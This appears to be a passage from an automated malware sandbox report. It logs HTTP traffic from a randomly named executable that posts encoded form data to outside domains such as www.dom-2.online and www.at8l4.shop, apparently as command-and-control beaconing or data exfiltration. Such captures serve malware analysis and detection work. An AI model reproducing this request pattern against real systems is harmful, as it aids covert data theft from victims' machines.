SnMD2MHs6ifQTIvnxySvIuIqwaXZYKpWMp0k+GSFkY+XKSAjeVnMZLTORkc5j71NG9WHilG53CNdlDST4Ek5Q/mvj2PFt7hP+yQ6C3rTH2GSTpGWcdsDZwiuE [TRUNCATED]
Aug 27, 2024 17:49:27.889492035 CEST	3867	OUT	Data Raw: 39 39 59 74 67 5a 49 48 64 45 76 73 6c 43 52 44 2f 58 59 7a 35 77 55 6f 6f 78 4e 38 4d 6c 6b 48 42 57 61 52 44 6c 49 42 45 7a 35 45 61 65 42 54 36 62 36 41 48 76 4b 53 41 72 32 31 37 52 74 37 5a 77 37 33 2b 67 74 6b 63 70 4b 70 57 57 74 4e 6e 4c Data Ascii: 99YtgZIHdEvslCRD/XYz5wUooxN8MlkHBWaRDlIBEz5EaeBT6b6AHvKSAr217Rt7Zw73+gtkcpKpWWtNnL328qOfP6riBWtYwpK2WZCUI+bXTuMZohbTgsugPuaFtAPFxKlhTTZr7Ls1yRf2bBGM2DH6HQSJFOJZ+GtsI9ihw94TVMrF9O5Skh+iXMZL2IohwTG+uQc20iDJYnkO8V315mkt88jpKMeHQXDp8CTT7lWjiolSZOZ
Aug 27, 2024 17:49:27.889539003 CEST	6445	OUT	Data Raw: 61 36 51 49 4f 49 73 50 4d 6a 73 34 42 47 44 7a 37 62 44 73 52 47 58 4a 61 43 4f 48 5a 35 69 32 76 32 54 4a 6b 70 46 35 2f 7a 2f 51 4b 42 32 59 4f 42 59 70 57 53 57 6d 75 49 65 45 79 30 68 53 4c 55 6c 58 78 70 56 61 54 6f 65 44 69 79 33 30 37 46 Data Ascii: a6QIOIsPMjs4BGDz7bDsRGXJaCOHZ5i2v2TJkpF5/z/QKB2YOBYpWSWmuIeEy0hSLUlXxpVaToeDiy307FostlaRrYXcNbb2aNCuXceuanQPJ5pjG9GacvPDw+Xw/2VMb6cmZye7Ymq54MvEsW8kb0gsd5PJVHNHf6m70OuvnPz/He1LXaF2avWeEpko/y+02FbJfLE9BPdPnPbA6dKyihaUudD7TZl0sLO2mE/z/zy9E0YQmqZ
Aug 27, 2024 17:49:27.990492105 CEST	1289	OUT	Data Raw: 69 73 35 51 47 6f 47 6c 34 63 51 31 6b 55 78 65 6f 6c 59 67 4c 7a 2b 52 45 71 71 50 39 36 77 44 43 64 64 6a 2f 38 36 54 6e 76 61 5a 6c 4e 74 78 39 68 2f 52 69 66 72 5a 64 38 48 33 78 2f 54 76 4e 78 2b 56 6b 66 53 49 46 34 38 49 61 37 52 49 35 54 Data Ascii: is5QGoGl4cQ1kUxeolYgLz+REqqP96wDCddj/86TnvaZlNtx9h/RifrZd8H3x/TvNx+VkfSIF48Ia7RI5Tb8e77Hzl28tTwMh9F9HyrfU3v14VVeS79TTEsAd+0sIxMwSYYxfRlxs5/1dtA3C4s/6jeNzk8ISOEp3mIBefRKjm0sK+p/TWwoHwJl73mJoNy+kGScdw1SSPQGUrmb2+QS9jlCrw0UDIAozZj21jv/GVatONyWI6Y
Aug 27, 2024 17:49:27.990663052 CEST	10312	OUT	Data Raw: 4d 51 48 55 58 4c 4f 65 61 71 39 61 52 65 35 2b 7a 74 69 6a 74 6c 33 73 41 61 42 59 39 59 2f 4a 4d 53 46 66 30 32 70 6f 61 57 64 49 68 78 59 57 57 74 55 2b 2b 43 45 54 35 54 59 2f 67 4d 68 4a 55 2f 6f 71 41 61 50 79 4b 65 6c 45 6c 55 33 39 56 4d Data Ascii: MQHUXLOeaq9aRe5+ztijtl3sAaBY9Y/JMSFf02poaWdIhxYWWtU++CET5TY/gMhJU/oqAaPyKelElU39VM67nj8hmX/QlDkcOzKohCHUhB4tpFWrJuFa9aDC9CX+HVRMAqmgjJUknVqNvV3FnTXglfvGLZPhwiOpMQXPYpwMaHqZ25GG0eErDeQc8tcIEGp0/8zfcAB5Ur+saRLFu8JFWqgYREYiWJkeZh49ZkrPmx4T93nHRV8
Aug 27, 2024 17:49:27.990858078 CEST	6445	OUT	Data Raw: 52 30 62 53 63 75 74 70 36 64 38 6d 6b 32 4d 7a 37 62 4a 43 30 67 62 49 50 72 37 6d 44 49 79 73 65 74 72 4d 39 63 65 7a 74 62 48 49 69 45 65 77 36 74 46 76 66 4f 45 6d 45 74 65 49 6e 43 49 31 6a 6c 35 56 5a 65 36 6d 66 6e 52 30 68 67 51 69 7a 6c Data Ascii: R0bScutp6d8mk2Mz7bJC0gbIPr7mDIysetrM9ceztbHIiEew6tFvfOEmEteInCI1jl5VZe6mfnR0hgQizlImSgP9TjG8Qo81IxUB4OOYwmvO7HdZdRrHMR/FWbOQ6yskX/t6B6uDmAKlMtE5OBtNi5WzujmucM8+qGGi3qV1ZmL25XDijx+6YY/9V0h2UMcUaTChTCbAP39vuL6p/dI/LpOQihRqCpHgCtL9hlVXzpsZp+XMjy3
Aug 27, 2024 17:49:27.991003036 CEST	7734	OUT	Data Raw: 6d 4e 35 36 77 77 73 4b 64 4a 2f 57 30 53 7a 62 71 38 35 43 53 64 33 35 68 6b 5a 31 38 5a 71 49 77 39 7a 31 4e 41 2b 6f 62 6e 63 50 32 4b 59 66 30 38 34 59 6a 32 59 75 2b 65 48 56 75 78 31 58 52 57 50 48 52 67 46 46 72 48 6c 30 6b 76 70 30 50 42 Data Ascii: mN56wwsKdJ/W0Szbq85CSd35hkZ18ZqIw9z1NA+obncP2KYf084Yj2Yu+eHVux1XRWPHRgFFrHl0kvp0PBeiGu6MuEwW0pP7QCcxVZcKXgeNUjd0OrVkySN7Gx/Kmj/iHLGGHMylcGXc8J0+hzSfYemANosdFOr22W9LO70DoYJEN7pNAxM+fDOEUrTIO6bQQuUc3SYPK5YrY06fzaYzRs2UmW/MuvmTNK4+N94VqzyUlWdDdEQ
Aug 27, 2024 17:49:28.091774940 CEST	2578	OUT	Data Raw: 38 44 76 53 4f 4c 32 4a 4e 64 32 41 4f 71 43 35 69 2b 52 69 6d 30 58 53 51 59 50 56 56 64 4d 4d 6b 5a 41 56 53 41 66 6e 41 4b 52 7a 46 5a 30 46 4b 68 79 49 50 46 71 41 76 46 4a 64 30 67 63 6d 6f 52 72 73 54 56 67 6f 48 79 46 2b 6f 4a 78 33 34 37 Data Ascii: 8DvSOL2JNd2AOqC5i+Rim0XSQYPVVdMMkZAVSAfnAKRzFZ0FKhyIPFqAvFJd0gcmoRrsTVgoHyF+oJx347wqU1LwgcuiW/kv0rw7qQaafhKkAiMxzN1SFMz7V7B2uKpsHt1pWjhxVfakbceWP89SeK8zPvZh48gt7jXPoCsV1PpLPVV8vO2pKPANvfArzNuObOHkKh14JfUEwKdbFlltfS70VBN8QgsAW+RCC39fNcIC0PuO25e
Aug 27, 2024 17:49:28.091944933 CEST	7734	OUT	Data Raw: 53 56 34 64 58 38 5a 70 5a 6c 49 31 49 77 47 68 77 69 43 41 30 37 2b 63 50 39 74 42 6a 67 4b 39 69 69 39 32 59 63 47 69 2b 72 79 50 58 73 2f 66 77 56 45 46 43 32 31 44 44 69 68 72 69 6d 6a 75 49 59 55 4f 4b 59 4c 68 67 71 57 45 32 52 6a 2b 4f 6a Data Ascii: SV4dX8ZpZlI1IwGhwiCA07+cP9tBjgK9ii92YcGi+ryPXs/fwVEFC21DDihrimjuIYUOKYLhgqWE2Rj+OjHDWBr8EnV12dU+AXFbdpMF4wzzfNj0ZhSW3VgQ+OcZWuE0xZg5WqFX9QhKh9K5Q8x5lSj1BtZorm+oOs70gtW6QweH9ZOOTFeRG/uK8IPa8RvIzIIDFUrpIdDZ1MDZEUPf4ZgL60Qkcb3z2k8mNy4O7BQR/4WtdWR
Aug 27, 2024 17:49:28.091993093 CEST	3867	OUT	Data Raw: 75 62 6c 6a 61 74 36 42 74 34 51 4d 31 67 43 56 76 41 48 31 4f 52 37 79 59 74 53 52 4e 44 2f 52 4f 65 6b 72 42 38 71 44 70 44 79 4d 37 5a 73 2f 6a 61 52 54 61 49 42 35 64 46 2f 55 36 58 45 4d 49 67 53 68 35 5a 6b 50 2f 58 4a 70 6c 2f 65 6c 64 64 Data Ascii: ubljat6Bt4QM1gCVvAH1OR7yYtSRND/ROekrB8qDpDyM7Zs/jaRTaIB5dF/U6XEMIgSh5ZkP/XJpl/elddW4ib+D446BkU1x5B75fs3GvZUk1stv5MKrBr3fJMNmlfkRyff9bjPt47NtF7/Yu9rARNqQz+vqhe5VNiUv9K1H6qeqKF3Zqgk4qQjJbflcCz2UteVFnvZ1BVrmdHSYFdDZ/kyTw+SWzdtv2eNqAzRjTwbN6CogSxp
Aug 27, 2024 17:49:28.092154980 CEST	670	OUT	Data Raw: 35 6c 54 77 6b 59 49 49 74 79 6b 4e 61 30 4c 33 4c 5a 64 41 36 48 4c 77 6f 76 6b 74 52 43 34 55 58 65 58 64 6f 30 77 6d 58 74 49 31 31 6d 39 65 76 37 61 6c 6b 58 46 34 4b 76 6d 53 41 41 55 66 6e 42 65 4e 65 51 59 38 41 69 6a 43 51 4c 62 39 69 72 Data Ascii: 5lTwkYIItykNa0L3LZdA6HLwovktRC4UXeXdo0wmXtI11m9ev7alkXF4KvmSAAUfnBeNeQY8AijCQLb9irqUdRZZzj9F6QY27sxwxwxb7g/UcktfpmlJXfYzDkhs72olDmVJOXXK223hz1vZK/aTz4svbkwWe/L7t6lrCxkOMPPODpTnPJPXoaD84iAMGBcRkfg+r/XvdPzCnyiNpiWf6P9oN8ABHYYXq1hRPmreobf3LTmFbSE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.20	49847	3.33.130.190	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:30.525892973 CEST	523	OUT	GET /euco/?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.at8l4.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:49:30.628740072 CEST	397	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 27 Aug 2024 15:49:30 GMT Content-Type: text/html Content-Length: 257 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 76 4c 4c 4c 62 4f 68 3d 47 50 41 42 66 47 64 4f 4c 46 47 31 34 6e 34 51 67 6e 42 69 5a 2b 42 73 79 49 76 72 7a 6a 56 44 44 4c 79 76 51 76 36 61 75 7a 48 69 4e 33 62 2f 61 57 73 6d 47 4c 34 4a 2f 4d 2b 32 59 52 56 72 2f 34 37 6b 32 5a 6c 70 70 72 77 6c 75 76 71 74 6f 59 70 69 64 72 4a 56 73 38 73 71 32 61 4b 78 5a 42 63 49 4b 79 36 56 32 41 68 7a 30 72 4b 56 4c 47 58 6d 42 47 59 3d 26 37 52 42 3d 36 36 6e 50 79 4c 47 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.20	49848	199.59.243.226	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:35.858144999 CEST	788	OUT	POST /i0bg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.dom-2.online Origin: http://www.dom-2.online Referer: http://www.dom-2.online/i0bg/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 57 53 69 31 57 79 43 74 6e 79 64 56 4c 76 52 65 65 71 49 78 68 71 64 77 47 61 62 42 7a 69 54 68 37 5a 77 64 6e 57 4f 64 43 6f 75 43 75 78 2b 6c 6e 61 39 6d 70 69 4a 71 6b 2b 44 78 55 36 74 69 38 48 4c 58 7a 69 34 39 54 74 55 6e 4b 75 78 69 2b 77 77 37 31 38 6f 73 6e 44 2f 46 4c 49 42 68 72 42 71 6d 55 71 68 2b 73 2b 37 61 47 50 73 72 62 51 68 2f 6d 64 58 2f 39 2f 34 7a 6d 61 53 65 63 6f 4e 65 51 54 6b 4c 78 66 5a 6b 78 4a 6a 70 37 55 30 34 6d 32 30 52 66 61 71 63 64 61 6f 58 39 63 4f 74 54 42 43 68 69 4d 6c 52 69 46 76 53 4b 6b 75 77 33 4a 6e 63 2f 36 44 54 65 77 2b 45 2f 41 3d 3d Data Ascii: AvLLLbOh=WSi1WyCtnydVLvReeqIxhqdwGabBziTh7ZwdnWOdCouCux+lna9mpiJqk+DxU6ti8HLXzi49TtUnKuxi+ww718osnD/FLIBhrBqmUqh+s+7aGPsrbQh/mdX/9/4zmaSecoNeQTkLxfZkxJjp7U04m20RfaqcdaoX9cOtTBChiMlRiFvSKkuw3Jnc/6DTew+E/A==
Aug 27, 2024 17:49:35.962555885 CEST	1200	IN	HTTP/1.1 200 OK date: Tue, 27 Aug 2024 15:49:35 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 481d55cd-bb99-4d17-b84f-4a1d2d358108 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LpZikASgXBSeZs4l5OpRFGx1VvEOEXW5XJTSMC5uyxwfAWjeAWoZbcWN6IH1EXqgxd539bQxLHTzV6hFExB7uA== set-cookie: parking_session=481d55cd-bb99-4d17-b84f-4a1d2d358108; expires=Tue, 27 Aug 2024 16:04:35 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 70 5a 69 6b 41 53 67 58 42 53 65 5a 73 34 6c 35 4f 70 52 46 47 78 31 56 76 45 4f 45 58 57 35 58 4a 54 53 4d 43 35 75 79 78 77 66 41 57 6a 65 41 57 6f 5a 62 63 57 4e 36 49 48 31 45 58 71 67 78 64 35 33 39 62 51 78 4c 48 54 7a 56 36 68 46 45 78 42 37 75 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LpZikASgXBSeZs4l5OpRFGx1VvEOEXW5XJTSMC5uyxwfAWjeAWoZbcWN6IH1EXqgxd539bQxLHTzV6hFExB7uA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
Aug 27, 2024 17:49:35.962642908 CEST	603	IN	Data Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDgxZDU1Y2QtYmI5OS00ZDE3LWI4NGYtNGExZDJkMz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.20	49849	199.59.243.226	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:38.497517109 CEST	1128	OUT	POST /i0bg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.dom-2.online Origin: http://www.dom-2.online Referer: http://www.dom-2.online/i0bg/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 57 53 69 31 57 79 43 74 6e 79 64 56 4c 50 42 65 5a 4a 67 78 30 61 64 78 4b 36 62 42 36 43 54 39 37 5a 30 64 6e 58 62 51 43 36 4b 43 75 51 4f 6c 67 75 68 6d 36 53 4a 71 38 75 44 30 51 36 74 54 38 48 58 68 7a 69 45 39 54 74 51 6e 4b 63 4a 69 38 41 77 34 39 63 6f 76 77 7a 2f 47 50 49 42 37 72 42 32 51 55 72 31 2b 76 50 6e 61 48 4a 59 72 4b 52 68 38 31 4e 58 39 31 66 34 77 2f 4b 53 75 63 6f 42 57 51 57 67 78 78 4a 78 6b 77 74 58 70 36 55 30 37 73 47 30 57 54 36 72 71 56 66 56 34 6c 50 65 37 51 7a 6e 2b 76 74 39 6d 6e 47 7a 74 4f 6b 4f 77 70 72 33 75 38 37 65 4e 65 69 76 62 72 77 71 31 37 78 44 32 55 64 34 78 5a 56 2f 52 58 6b 5a 6b 34 6e 42 62 4c 47 6e 56 73 59 2f 5a 51 50 79 33 58 67 79 4b 33 4c 73 6f 36 6c 37 53 39 73 37 58 54 57 56 52 6b 37 70 55 69 46 74 41 78 61 75 30 35 64 72 4a 78 64 65 5a 6b 63 75 30 6d 4e 4d 41 51 41 78 73 6e 2f 75 58 4f 6c 70 45 71 6f 69 47 75 64 58 78 6d 64 43 49 75 72 6c 58 55 52 6b 79 4d 4e 57 4d 31 6e 69 79 73 30 30 4f 76 2b 6c 59 43 45 72 47 79 [TRUNCATED] Data Ascii: AvLLLbOh=WSi1WyCtnydVLPBeZJgx0adxK6bB6CT97Z0dnXbQC6KCuQOlguhm6SJq8uD0Q6tT8HXhziE9TtQnKcJi8Aw49covwz/GPIB7rB2QUr1+vPnaHJYrKRh81NX91f4w/KSucoBWQWgxxJxkwtXp6U07sG0WT6rqVfV4lPe7Qzn+vt9mnGztOkOwpr3u87eNeivbrwq17xD2Ud4xZV/RXkZk4nBbLGnVsY/ZQPy3XgyK3Lso6l7S9s7XTWVRk7pUiFtAxau05drJxdeZkcu0mNMAQAxsn/uXOlpEqoiGudXxmdCIurlXURkyMNWM1niys00Ov+lYCErGyEL77JZk1s0x1aDU9RG9IfhBSeUwtahytTWMOn6B74VWojISlj0IZRBKnmhX2fpkxKX6WEJQsUmjBvGpSZ8A/1qwVnmJrkWgno2UjUbpxNw2YQWn+54WR6oSY2hw9J56Xk2VDtEyzgKnsKSRvF989Yry5HXKjQZ5V7N6ktY2awzpsrHoAuwrRNl0u1LDg6gD0RgHfv7M7yUqEmE=
Aug 27, 2024 17:49:38.600132942 CEST	1200	IN	HTTP/1.1 200 OK date: Tue, 27 Aug 2024 15:49:37 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 93c08467-57f7-41a1-a398-84e4fbb99352 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LpZikASgXBSeZs4l5OpRFGx1VvEOEXW5XJTSMC5uyxwfAWjeAWoZbcWN6IH1EXqgxd539bQxLHTzV6hFExB7uA== set-cookie: parking_session=93c08467-57f7-41a1-a398-84e4fbb99352; expires=Tue, 27 Aug 2024 16:04:38 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 70 5a 69 6b 41 53 67 58 42 53 65 5a 73 34 6c 35 4f 70 52 46 47 78 31 56 76 45 4f 45 58 57 35 58 4a 54 53 4d 43 35 75 79 78 77 66 41 57 6a 65 41 57 6f 5a 62 63 57 4e 36 49 48 31 45 58 71 67 78 64 35 33 39 62 51 78 4c 48 54 7a 56 36 68 46 45 78 42 37 75 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LpZikASgXBSeZs4l5OpRFGx1VvEOEXW5XJTSMC5uyxwfAWjeAWoZbcWN6IH1EXqgxd539bQxLHTzV6hFExB7uA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
Aug 27, 2024 17:49:38.600251913 CEST	603	IN	Data Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTNjMDg0NjctNTdmNy00MWExLWEzOTgtODRlNGZiYj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.20	49850	199.59.243.226	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:41.136535883 CEST	1289	OUT	POST /i0bg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.dom-2.online Origin: http://www.dom-2.online Referer: http://www.dom-2.online/i0bg/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 57 53 69 31 57 79 43 74 6e 79 64 56 4c 50 42 65 5a 4a 67 78 30 61 64 78 4b 36 62 42 36 43 54 39 37 5a 30 64 6e 58 62 51 43 36 43 43 75 6d 61 6c 6a 4a 56 6d 72 69 4a 71 31 4f 44 31 51 36 74 30 38 48 65 6f 7a 69 4a 4b 54 75 34 6e 4c 4c 4e 69 38 79 6f 34 34 63 6f 79 2b 54 2f 45 4c 49 41 69 72 42 71 45 55 72 67 42 73 2b 54 61 47 4f 63 72 62 79 5a 2f 70 4e 58 2f 31 66 34 33 70 36 53 6d 63 70 30 4e 51 57 73 78 78 50 78 6b 77 59 54 70 39 48 73 37 6c 32 30 56 49 4b 72 35 4d 50 56 5a 6c 50 4b 46 51 7a 6d 42 76 70 6c 6d 6e 46 72 74 50 6b 79 7a 6f 4c 33 75 78 62 65 43 56 43 6a 66 72 78 47 74 37 77 6e 32 55 64 51 78 5a 31 2f 52 63 6d 78 6e 2f 48 42 42 50 47 6e 47 39 49 7a 52 51 4c 53 6a 58 6c 4b 4b 33 62 51 6f 34 55 37 53 77 74 37 58 4d 47 56 58 71 62 6f 4b 73 6c 74 71 78 61 2b 5a 35 5a 57 38 78 65 79 5a 32 49 79 30 74 4a 59 50 53 67 77 6e 71 76 75 4f 4b 6c 31 41 71 73 2b 61 75 64 58 68 6d 66 75 49 75 37 35 58 54 55 49 39 63 74 57 48 38 48 6a 6d 33 6b 34 59 76 2b 35 51 43 46 54 6f 79 [TRUNCATED] Data Ascii: 